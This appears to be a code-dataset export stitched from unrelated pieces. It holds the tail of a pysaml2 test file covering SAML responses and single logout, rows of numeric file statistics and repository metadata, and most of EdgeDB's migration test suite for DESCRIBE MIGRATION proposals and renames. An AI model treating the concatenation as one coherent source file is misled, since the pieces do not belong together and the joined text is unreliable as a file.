IDENTITY.copy(), "aaa", "http://example.com/sp/",
"http://www.example.com/roland/sp")
assert response is not None
assert response.destination == "http://example.com/sp/"
assert response.in_response_to == "aaa"
assert response.version == "2.0"
assert response.issuer.text == "urn:mace:example.com:saml:roland:idpr"
assert response.status.status_code.value == samlp.STATUS_SUCCESS
assert response.assertion
assertion = response.assertion
assert assertion.version == "2.0"
subject = assertion.subject
#assert subject.name_id.format == saml.NAMEID_FORMAT_TRANSIENT
assert subject.subject_confirmation
subject_conf = subject.subject_confirmation[0]
assert subject_conf.subject_confirmation_data.in_response_to == "aaa"
def _logout_request(conf_file):
conf = config.SPConfig()
conf.load_file(conf_file)
sp = client.Saml2Client(conf)
soon = time_util.in_a_while(days=1)
sinfo = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": soon,
"user": {
"givenName": "Leo",
"sn": "Laport",
}
}
sp.users.add_information_about_person(sinfo)
return sp.create_logout_request(
name_id=nid,
destination="http://localhost:8088/slo",
issuer_entity_id="urn:mace:example.com:saml:roland:idp",
reason="I'm tired of this")
class TestServerLogout():
def test_1(self):
with closing(Server("idp_slo_redirect_conf")) as server:
req_id, request = _logout_request("sp_slo_redirect_conf")
print(request)
bindings = [BINDING_HTTP_REDIRECT]
response = server.create_logout_response(request, bindings)
binding, destination = server.pick_binding(
"single_logout_service", bindings, "spsso", request
)
http_args = server.apply_binding(
binding, "%s" % response, destination, "relay_state", response=True
)
assert len(http_args) == 5
assert http_args["headers"][0][0] == "Location"
assert http_args["data"] == []
assert http_args["status"] == 303
assert http_args['url'] == 'http://lingon.catalogix.se:8087/sloresp'
def test_2(self):
with closing(Server("idp_slo_redirect_conf")) as server:
req_id, request = _logout_request("sp_slo_redirect_conf")
print(request)
bindings = [BINDING_HTTP_POST]
response = server.create_logout_response(request, bindings)
binding, destination = server.pick_binding(
"single_logout_service", bindings, "spsso", request
)
http_args = server.apply_binding(
binding, "%s" % response, destination, "relay_state", response=True
)
assert len(http_args) == 5
assert len(http_args["data"]) > 0
assert http_args["method"] == "POST"
assert http_args['url'] == 'http://lingon.catalogix.se:8087/slo'
assert http_args['status'] == 200
if __name__ == "__main__":
ts = TestServer1()
ts.setup_class()
ts.test_encrypted_signed_response_1()
| 38.576271
| 124
| 0.588456
| 9,941
| 91,040
| 5.106931
| 0.039936
| 0.032304
| 0.019382
| 0.026454
| 0.950264
| 0.94404
| 0.941499
| 0.939115
| 0.93748
| 0.933501
| 0
| 0.01517
| 0.308524
| 91,040
| 2,359
| 125
| 38.592624
| 0.791285
| 0.049418
| 0
| 0.874866
| 0
| 0.001074
| 0.13229
| 0.051857
| 0
| 0
| 0
| 0
| 0.296992
| 1
| 0.042965
| false
| 0.004296
| 0.01826
| 0.000537
| 0.066058
| 0.025242
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6af855685ab3713bab1551c32a5b2f165b05dbcf
| 283,734
|
py
|
Python
|
tests/test_edgeql_data_migration.py
|
jamilabreu/edgedb
|
6d3f222e4c5d3300f483b4e06e8f747c6381f313
|
[
"Apache-2.0"
] | null | null | null |
tests/test_edgeql_data_migration.py
|
jamilabreu/edgedb
|
6d3f222e4c5d3300f483b4e06e8f747c6381f313
|
[
"Apache-2.0"
] | null | null | null |
tests/test_edgeql_data_migration.py
|
jamilabreu/edgedb
|
6d3f222e4c5d3300f483b4e06e8f747c6381f313
|
[
"Apache-2.0"
] | null | null | null |
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2019-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
from typing import *
import json
import os.path
import re
import textwrap
import uuid
import edgedb
from edb.testbase import server as tb
from edb.tools import test
class TestEdgeQLDataMigration(tb.DDLTestCase):
"""Test that migrations preserve data under certain circumstances.
Renaming, changing constraints, increasing cardinality should not
destroy data.
Some of the test cases here use the same migrations as
`test_schema_migrations_equivalence`, therefore the test numbers
should match for easy reference, even if it means skipping some.
"""
DEFAULT_MODULE = 'test'
def normalize_statement(self, s: str) -> str:
re_filter = re.compile(r'[\s]+|(#.*?(\n|$))|(,(?=\s*[})]))')
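        # re_filter removes all whitespace, '#'-style line comments, and trailing
        # commas before ')' or '}'; together with lower() this lets statements be
        # compared irrespective of formatting.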
stripped = textwrap.dedent(s.lstrip('\n')).rstrip('\n')
folded = re_filter.sub('', stripped).lower()
return folded
def cleanup_migration_exp_json(self, exp_result_json):
# Cleanup the expected values by dedenting/stripping them
if 'confirmed' in exp_result_json:
exp_result_json['confirmed'] = [
self.normalize_statement(v)
for v in exp_result_json['confirmed']
]
if (
'proposed' in exp_result_json
and exp_result_json['proposed']
and 'statements' in exp_result_json['proposed']
):
for stmt in exp_result_json['proposed']['statements']:
stmt['text'] = self.normalize_statement(stmt['text'])
async def assert_describe_migration(self, exp_result_json, *, msg=None):
self.cleanup_migration_exp_json(exp_result_json)
try:
res = await self.con.query_single(
'DESCRIBE CURRENT MIGRATION AS JSON;')
res = json.loads(res)
self.cleanup_migration_exp_json(res)
self._assert_data_shape(res, exp_result_json, message=msg)
except Exception:
self.add_fail_notes(serialization='json')
raise
async def fast_forward_describe_migration(
self,
*,
limit: Optional[int] = None,
user_input: Optional[Iterable[str]] = None,
commit: bool = True,
):
'''Repeatedly get the next step from DESCRIBE and execute it.
The point of this as opposed to just using "POPULATE
MIGRATION; COMMIT MIGRATION;" is that we want to make sure
that the generated DDL is valid and in case it's not, narrow
down which step is causing issues.
'''
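        # For reference, the JSON returned by DESCRIBE CURRENT MIGRATION has
        # roughly this shape (illustrative only; just the keys this helper uses):
        #   {
        #       "parent": "m1...",
        #       "complete": false,
        #       "confirmed": ["<DDL that has already been applied>"],
        #       "proposed": {
        #           "prompt": "did you ...?",
        #           "statements": [{"text": "<DDL to run next>"}],
        #           "required_user_input": [
        #               {"placeholder": "<name>", "prompt": "<question>"}
        #           ]
        #       }
        #   }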
# Keep track of proposed DDL
prevddl = ''
if user_input is None:
input_iter: Iterator[str] = iter(tuple())
else:
input_iter = iter(user_input)
try:
step = 0
while True:
mig = await self.con.query_single(
'DESCRIBE CURRENT MIGRATION AS JSON;')
mig = json.loads(mig)
if mig['proposed'] is None:
self._assert_data_shape(
mig, {'complete': True},
message='No more "proposed", but not "completed" '
'either.'
)
if commit:
await self.con.execute('COMMIT MIGRATION;')
break
interpolations = {}
user_input_reqs = mig['proposed']['required_user_input']
if user_input_reqs:
for var in user_input_reqs:
var_name = var['placeholder']
var_desc = var['prompt']
try:
var_value = next(input_iter)
except StopIteration:
raise AssertionError(
f'missing input value for prompt: {var_desc}'
) from None
interpolations[var_name] = var_value
for stmt in mig['proposed']['statements']:
curddl = stmt['text']
if interpolations:
def _replace(match):
var_name = match.group(1)
var_value = interpolations.get(var_name)
if var_value is None:
raise AssertionError(
f'missing value for '
f'placeholder {var_name!r}'
)
return var_value
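                        # The proposed DDL may contain \(name) placeholders for
                        # required user input; substitute each one with the
                        # matching value collected above before executing it.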
curddl = re.sub(r'\\\((\w+)\)', _replace, curddl)
if prevddl == curddl:
raise Exception(
f"Repeated previous proposed DDL {curddl!r}"
)
try:
await self.con.execute(curddl)
except Exception as exc:
raise Exception(
f"Error while processing {curddl!r}"
) from exc
prevddl = curddl
step += 1
if limit is not None and step == limit:
break
except Exception:
self.add_fail_notes(serialization='json')
raise
async def start_migration(self, migration, *,
populate: bool = False,
module: str = 'test'):
mig = f"""
START MIGRATION TO {{
module {module} {{
{migration}
}}
}};
"""
await self.con.execute(mig)
if populate:
await self.con.execute('POPULATE MIGRATION;')
async def migrate(
self,
migration,
*,
populate: bool = False,
module: str = 'test',
user_input: Optional[Iterable[str]] = None,
):
async with self.con.transaction():
await self.start_migration(
migration, populate=populate, module=module)
await self.fast_forward_describe_migration(user_input=user_input)
async def interact(self, parts, check_complete=True):
for part in parts:
if isinstance(part, str):
prompt = part
ans = "y"
user_input = None
else:
prompt, ans, *user_input = part
await self.assert_describe_migration({
'proposed': {'prompt': prompt}
})
if ans == "y":
await self.fast_forward_describe_migration(
limit=1, user_input=user_input)
else:
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
if check_complete:
await self.assert_describe_migration({
'complete': True
})
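    # Illustrative use of interact() (a sketch, not an actual test in this
    # file): bare strings are prompts that get accepted, while a tuple's
    # second element can reject the proposal or supply extra user input.
    #
    #   await self.interact([
    #       "did you create object type 'test::Foo'?",         # accepted ("y")
    #       ("did you drop object type 'test::Bar'?", "n"),     # rejected
    #   ])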
async def test_edgeql_migration_simple_01(self):
# Base case, ensuring a single SDL migration from a clean
# state works.
await self.migrate("""
type NamedObject {
required property name -> str;
multi link related -> NamedObject {
property lang -> str;
};
};
""")
await self.con.execute("""
SET MODULE test;
INSERT NamedObject {
name := 'Test'
};
INSERT NamedObject {
name := 'Test 2',
related := (SELECT DETACHED NamedObject
FILTER .name = 'Test')
};
""")
await self.assert_query_result(
r"""
SELECT
NamedObject {
related: {
name,
@lang
}
}
FILTER
.name = 'Test 2';
""",
[
{
'related': [{'name': 'Test', '@lang': None}],
}
]
)
async def test_edgeql_migration_link_inheritance(self):
schema_f = os.path.join(os.path.dirname(__file__), 'schemas',
'links_1.esdl')
with open(schema_f) as f:
schema = f.read()
await self.migrate(schema)
await self.con.execute('''
SET MODULE test;
INSERT Target1 {
name := 'Target1_linkinh_2'
};
INSERT ObjectType01 {
target := (SELECT Target1
FILTER .name = 'Target1_linkinh_2'
LIMIT 1)
};
INSERT Target0 {
name := 'Target0_linkinh_2'
};
INSERT ObjectType23 {
target := (SELECT Target0
FILTER .name = 'Target0_linkinh_2'
LIMIT 1)
};
''')
await self.con.query('DECLARE SAVEPOINT t0;')
with self.assertRaisesRegex(
edgedb.InvalidLinkTargetError,
r"invalid target for link 'target' of object type "
r"'test::ObjectType01': "
r"'test::Target0' \(expecting 'test::Target1'\)"):
# Target0 is not allowed to be targeted by ObjectType01, since
# ObjectType01 inherits from ObjectType1 which requires more
# specific Target1.
await self.con.execute('''
INSERT ObjectType01 {
target := (
SELECT
Target0
FILTER
.name = 'Target0_linkinh_2'
LIMIT 1
)
};
''')
schema_f = os.path.join(os.path.dirname(__file__), 'schemas',
'links_1_migrated.esdl')
with open(schema_f) as f:
schema = f.read()
await self.con.query('ROLLBACK TO SAVEPOINT t0')
await self.migrate(schema)
async def test_edgeql_migration_describe_reject_01(self):
await self.migrate('''
type Foo;
''')
await self.start_migration('''
type Bar;
''')
await self.assert_describe_migration({
'proposed': {
'statements': [{
'text': """
ALTER TYPE test::Foo RENAME TO test::Bar;
"""
}]
}
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
await self.assert_describe_migration({
'proposed': {
'statements': [{
'text': """
CREATE TYPE test::Bar;
"""
}]
}
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
await self.assert_describe_migration({
'proposed': {
'statements': [{
'text': """
DROP TYPE test::Foo;
"""
}]
}
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
await self.assert_describe_migration({
'proposed': None,
'complete': False,
})
async def test_edgeql_migration_describe_reject_02(self):
await self.con.execute('''
START MIGRATION TO {
module test {
};
};
''')
await self.assert_describe_migration({
'parent': 'm1a2l6lbzimqokzygdzbkyjrhbmjh3iljg7i2m6r2ias2z2de4x4cq',
'confirmed': [],
'complete': True,
'proposed': None,
})
# Reject an empty proposal, which should be an idempotent
# operation. So reject it several times.
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
ALTER CURRENT MIGRATION REJECT PROPOSED;
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
async def test_edgeql_migration_describe_reject_03(self):
await self.con.execute('''
START MIGRATION TO {
module test {
type Type0;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': 'CREATE TYPE test::Type0;'
}],
'prompt': "did you create object type 'test::Type0'?",
},
})
# Reject a proposal until we run out of options.
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
ALTER CURRENT MIGRATION REJECT PROPOSED;
ALTER CURRENT MIGRATION REJECT PROPOSED;
ALTER CURRENT MIGRATION REJECT PROPOSED;
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': None,
})
async def test_edgeql_migration_describe_reject_04(self):
# Migration involving 2 modules
await self.con.execute('''
START MIGRATION TO {
module test {
type Test;
};
module other {
type Test;
};
};
''')
await self.fast_forward_describe_migration()
await self.con.execute('''
START MIGRATION TO {
module test {
type Test2;
};
module other {
type Test3;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': 'ALTER TYPE other::Test RENAME TO other::Test3;',
}],
'prompt': (
"did you rename object type 'other::Test' to "
"'other::Test3'?"
),
},
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': 'ALTER TYPE other::Test RENAME TO test::Test2;',
}],
'prompt': (
"did you rename object type 'other::Test' to "
"'test::Test2'?"
),
},
})
await self.con.execute('''
ALTER TYPE other::Test RENAME TO test::Test2;
''')
await self.assert_describe_migration({
'confirmed': [
'ALTER TYPE other::Test RENAME TO test::Test2;'
],
'complete': False,
'proposed': {
'statements': [{
'text': 'ALTER TYPE test::Test RENAME TO other::Test3;',
}],
'prompt': (
"did you rename object type 'test::Test' to "
"'other::Test3'?"
),
},
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
await self.assert_describe_migration({
'confirmed': [
'ALTER TYPE other::Test RENAME TO test::Test2;'
],
'complete': False,
'proposed': {
'statements': [{
'text': 'CREATE TYPE other::Test3;',
}],
'prompt': (
"did you create object type 'other::Test3'?"
),
},
})
# Change our mind and use a rejected operation to rename the
# type after all. So, we should be done now.
await self.con.execute('''
ALTER TYPE test::Test RENAME TO other::Test3;
''')
await self.assert_describe_migration({
'confirmed': [
'ALTER TYPE other::Test RENAME TO test::Test2;',
'ALTER TYPE test::Test RENAME TO other::Test3;',
],
'complete': True,
'proposed': None,
})
async def test_edgeql_migration_describe_reject_05(self):
await self.migrate('''
type User {
required property username -> str {
constraint exclusive;
constraint regexp(r'asdf');
}
}
''')
await self.start_migration('''
type User {
required property username -> str {
constraint exclusive;
constraint regexp(r'foo');
}
}
''')
await self.assert_describe_migration({
'proposed': {
'prompt': (
"did you drop constraint 'std::regexp' "
"of property 'username'?"
)
}
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
        # ... nothing more is proposed, so the migration cannot be completed.
await self.assert_describe_migration({
'complete': False,
'proposed': None,
})
async def test_edgeql_migration_describe_module_01(self):
# Migration that creates a new module.
await self.con.execute('''
START MIGRATION TO {
module new_module {
type Type0;
};
};
''')
# Validate that we create a 'new_module'
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': 'CREATE MODULE new_module IF NOT EXISTS;'
}],
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
# Drop the 'new_module'
await self.con.execute('''
START MIGRATION TO {
module default {};
};
''')
# Validate that we drop a 'new_module'
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': 'DROP TYPE new_module::Type0;'
}],
},
})
await self.con.execute('''
DROP TYPE new_module::Type0;
''')
await self.assert_describe_migration({
'confirmed': [
'DROP TYPE new_module::Type0;'
],
'complete': False,
'proposed': {
'statements': [{
'text': 'DROP MODULE new_module;'
}],
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
# Make sure that 'new_module' can be created again with no
# problems (i.e. it was dropped cleanly).
await self.con.execute('''
START MIGRATION TO {
module new_module {
type Type0;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': 'CREATE MODULE new_module IF NOT EXISTS;'
}],
},
})
await self.con.execute('''
CREATE MODULE new_module;
''')
await self.assert_describe_migration({
'confirmed': [
'CREATE MODULE new_module;',
],
'complete': False,
'proposed': {
'statements': [{
'text': 'CREATE TYPE new_module::Type0;'
}],
},
})
await self.con.execute('''
CREATE TYPE new_module::Type0;
COMMIT MIGRATION;
''')
await self.assert_query_result(
r"""
INSERT new_module::Type0;
""",
[{
'id': uuid.UUID,
}],
)
async def test_edgeql_migration_describe_type_01(self):
# Migration that renames a type.
await self.con.execute('''
START MIGRATION TO {
module test {
type Type1;
};
};
''')
await self.assert_describe_migration({
'parent': 'm1a2l6lbzimqokzygdzbkyjrhbmjh3iljg7i2m6r2ias2z2de4x4cq',
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE TYPE test::Type1;'
)
}],
'prompt': "did you create object type 'test::Type1'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
res = await self.con.query(r'''INSERT test::Type1;''')
await self.con.execute('''
START MIGRATION TO {
module test {
type Type01;
};
};
''')
await self.assert_describe_migration({
'parent': 'm1jywblj6c7z25ouifcicpxniu37jdpyunf62q4th7isdafcqu67gq',
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER TYPE test::Type1 RENAME TO test::Type01;'
)
}],
'prompt': (
"did you rename object type 'test::Type1' to "
"'test::Type01'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT test::Type01;
''', [{'id': res[0].id}])
async def test_edgeql_migration_describe_type_02(self):
# Migration that creates a type.
await self.con.execute('''
START MIGRATION TO {
module test {
type Type02;
};
};
''')
await self.assert_describe_migration({
'parent': 'm1a2l6lbzimqokzygdzbkyjrhbmjh3iljg7i2m6r2ias2z2de4x4cq',
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE TYPE test::Type02;'
)
}],
'prompt': "did you create object type 'test::Type02'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.con.query(r'''INSERT test::Type02;''')
# Migration that drops a type.
await self.con.execute('''
START MIGRATION TO {
module test {
};
};
''')
await self.assert_describe_migration({
'parent': 'm1fcvk56n44i62qwjnw5nqgafnbpulfhhaeb6kxqhh4c6lc4elwysa',
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'DROP TYPE test::Type02;'
)
}],
'prompt': (
"did you drop object type 'test::Type02'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
WITH MODULE schema
SELECT ObjectType
FILTER .name = 'test::Type02';
''', [])
# Make sure that type dropped cleanly by re-creating and
# using the type again.
await self.con.execute('''
START MIGRATION TO {
module test {
type Type02;
};
};
''')
await self.assert_describe_migration({
'parent': 'm1yee6qj63nps27cjnrcudwiupusdqkzrwistpvfbqf2fstcmwauwa',
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE TYPE test::Type02;'
)
}],
'prompt': "did you create object type 'test::Type02'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
INSERT test::Type02;
''', [{'id': uuid.UUID}])
async def test_edgeql_migration_describe_type_03(self):
await self.migrate('''
type Type0;
''')
await self.con.execute('''
START MIGRATION TO {
module test {
type Type1;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': "ALTER TYPE test::Type0 RENAME TO test::Type1;"
}],
'prompt': (
"did you rename object type 'test::Type0' to "
"'test::Type1'?"
),
},
})
# Instead of the suggestion do a couple of different, but
# equivalent commands.
await self.con.execute('''
ALTER TYPE test::Type0 RENAME TO test::TypeXX;
ALTER TYPE test::TypeXX RENAME TO test::Type1;
''')
await self.assert_describe_migration({
'confirmed': [
'ALTER TYPE test::Type0 RENAME TO test::TypeXX;',
'ALTER TYPE test::TypeXX RENAME TO test::Type1;',
],
'complete': True,
'proposed': None,
})
async def test_edgeql_migration_describe_type_04(self):
self.maxDiff = None
await self.migrate('''
type Test;
''')
await self.con.execute('''
START MIGRATION TO {
module test {
type Test2;
type Test3;
};
};
''')
await self.assert_describe_migration({
'parent': 'm1xh653zionj2aehqbh7x6km5lo3b2mjaftxdkvqoh3wluc3iv6k2a',
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': 'ALTER TYPE test::Test RENAME TO test::Test2;',
}],
'prompt': (
"did you rename object type 'test::Test' to 'test::Test2'?"
),
},
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
await self.assert_describe_migration({
'parent': 'm1xh653zionj2aehqbh7x6km5lo3b2mjaftxdkvqoh3wluc3iv6k2a',
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': 'ALTER TYPE test::Test RENAME TO test::Test3;',
}],
'prompt': (
"did you rename object type 'test::Test' to 'test::Test3'?"
),
},
})
await self.con.execute('''
ALTER TYPE test::Test RENAME TO test::Test3;
''')
await self.assert_describe_migration({
'parent': 'm1xh653zionj2aehqbh7x6km5lo3b2mjaftxdkvqoh3wluc3iv6k2a',
'confirmed': ['ALTER TYPE test::Test RENAME TO test::Test3;'],
'complete': False,
'proposed': {
'statements': [{
'text': 'CREATE TYPE test::Test2;',
}],
'prompt': (
"did you create object type 'test::Test2'?"
),
},
})
async def test_edgeql_migration_describe_property_01(self):
# Migration that renames a property.
await self.con.execute('''
START MIGRATION TO {
module test {
type Type01 {
property field1 -> str;
};
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE TYPE test::Type01 {\n'
' CREATE PROPERTY field1'
' -> std::str;\n'
'};'
)
}],
'prompt': "did you create object type 'test::Type01'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.con.execute('''
INSERT test::Type01 {
field1 := 'prop_test'
};
''')
await self.con.execute('''
START MIGRATION TO {
module test {
type Type01 {
property field01 -> str;
};
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER TYPE test::Type01 {\n'
' ALTER PROPERTY field1 {\n'
' RENAME TO field01;\n'
' };\n'
'};'
)
}],
'prompt': (
"did you rename property 'field1' of object type"
" 'test::Type01' to 'field01'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT test::Type01 {
field01
};
''', [{'field01': 'prop_test'}])
async def test_edgeql_migration_describe_property_02(self):
# Migration that creates a type with property.
await self.con.execute('''
START MIGRATION TO {
module test {
type Type02 {
property field02 -> str;
};
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE TYPE test::Type02 {\n'
' CREATE PROPERTY field02'
' -> std::str;\n'
'};'
)
}],
'prompt': "did you create object type 'test::Type02'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
res = await self.con.query('''
INSERT test::Type02 {
field02 := 'prop_test'
};
''')
# Migration that drops a property.
await self.con.execute('''
START MIGRATION TO {
module test {
type Type02;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER TYPE test::Type02 {\n'
' DROP PROPERTY field02;\n'
'};'
)
}],
'prompt': (
"did you drop property 'field02'"
" of object type 'test::Type02'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT test::Type02 {
id
};
''', [{
'id': res[0].id
}])
        # Make sure that the property was dropped cleanly by re-creating
        # and using the property again.
await self.con.execute('''
START MIGRATION TO {
module test {
type Type02 {
property field02 -> str;
};
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER TYPE test::Type02 {\n'
' CREATE PROPERTY field02'
' -> std::str;\n'
'};'
)
}],
'prompt': (
"did you create property 'field02'"
" of object type 'test::Type02'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT test::Type02 {
id,
field02,
};
''', [{
'id': res[0].id,
'field02': None,
}])
async def test_edgeql_migration_describe_link_01(self):
# Migration that renames a link.
await self.con.execute(r'''
START MIGRATION TO {
module test {
type Foo;
type Type01 {
link foo1 -> Foo;
};
};
};
# just initialize Foo, since we're interested in the other type
CREATE TYPE test::Foo;
''')
await self.assert_describe_migration({
'confirmed': ['CREATE TYPE test::Foo;'],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE TYPE test::Type01 {\n'
' CREATE LINK foo1'
' -> test::Foo;\n'
'};'
)
}],
'prompt': "did you create object type 'test::Type01'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
res = await self.con.query('''
WITH MODULE test
SELECT (
INSERT Type01 {
foo1 := (INSERT Foo)
}
) {
foo1
};
''')
await self.con.execute('''
START MIGRATION TO {
module test {
type Foo;
type Type01 {
link foo01 -> Foo;
};
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER TYPE test::Type01 {\n'
' ALTER LINK foo1 {\n'
' RENAME TO foo01;\n'
' };\n'
'};'
)
}],
'prompt': (
"did you rename link 'foo1' of object type"
" 'test::Type01' to 'foo01'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT test::Type01 {
foo01: {
id
}
};
''', [{'foo01': {'id': res[0].foo1.id}}])
async def test_edgeql_migration_describe_link_02(self):
        # Migration that creates a type with a link.
await self.con.execute(r'''
START MIGRATION TO {
module test {
type Foo;
type Type02 {
link foo02 -> Foo;
};
};
};
# just initialize Foo, since we're interested in the other type
CREATE TYPE test::Foo;
''')
await self.assert_describe_migration({
'confirmed': ['CREATE TYPE test::Foo;'],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE TYPE test::Type02 {\n'
' CREATE LINK foo02'
' -> test::Foo;\n'
'};'
)
}],
'prompt': "did you create object type 'test::Type02'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
res = await self.con.query('''
WITH MODULE test
SELECT (
INSERT Type02 {
foo02 := (INSERT Foo)
}
) {
foo02
}
''')
# Migration that drops a link.
await self.con.execute('''
START MIGRATION TO {
module test {
type Foo;
type Type02;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER TYPE test::Type02 {\n'
' DROP LINK foo02;\n'
'};'
)
}],
'prompt': (
"did you drop link 'foo02' of object type 'test::Type02'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT test::Type02 {
id
};
''', [{
'id': res[0].id
}])
await self.assert_query_result('''
SELECT test::Foo {
id
};
''', [{
'id': res[0].foo02.id
}])
        # Make sure that the link was dropped cleanly by re-creating
        # and using the link again.
await self.con.execute('''
START MIGRATION TO {
module test {
type Foo;
type Type02 {
link foo02 -> Foo;
};
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER TYPE test::Type02 {\n'
' CREATE LINK foo02'
' -> test::Foo;\n'
'};'
)
}],
'prompt': (
"did you create link 'foo02'"
" of object type 'test::Type02'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT test::Type02 {
id,
foo02: {
id
},
};
''', [{
'id': res[0].id,
'foo02': None,
}])
async def test_edgeql_migration_describe_link_03(self):
# Migration that renames a link.
await self.con.execute(r'''
START MIGRATION TO {
module test {
abstract link foo3;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE ABSTRACT LINK test::foo3;'
)
}],
'prompt': "did you create abstract link 'test::foo3'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.con.execute('''
START MIGRATION TO {
module test {
abstract link foo03;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER ABSTRACT LINK test::foo3 '
'RENAME TO test::foo03;'
)
}],
'prompt': (
"did you rename abstract link 'test::foo3' to "
"'test::foo03'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.con.execute('''
START MIGRATION TO {
module test {
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'DROP ABSTRACT LINK test::foo03;'
)
}],
'prompt': (
"did you drop abstract link 'test::foo03'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
async def test_edgeql_migration_describe_scalar_01(self):
# Migration that renames a type.
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type ScalarType1 extending int64;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE SCALAR TYPE test::ScalarType1'
' EXTENDING std::int64;'
)
}],
'prompt': "did you create scalar type 'test::ScalarType1'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT <test::ScalarType1>'1' + 2;
''', [3])
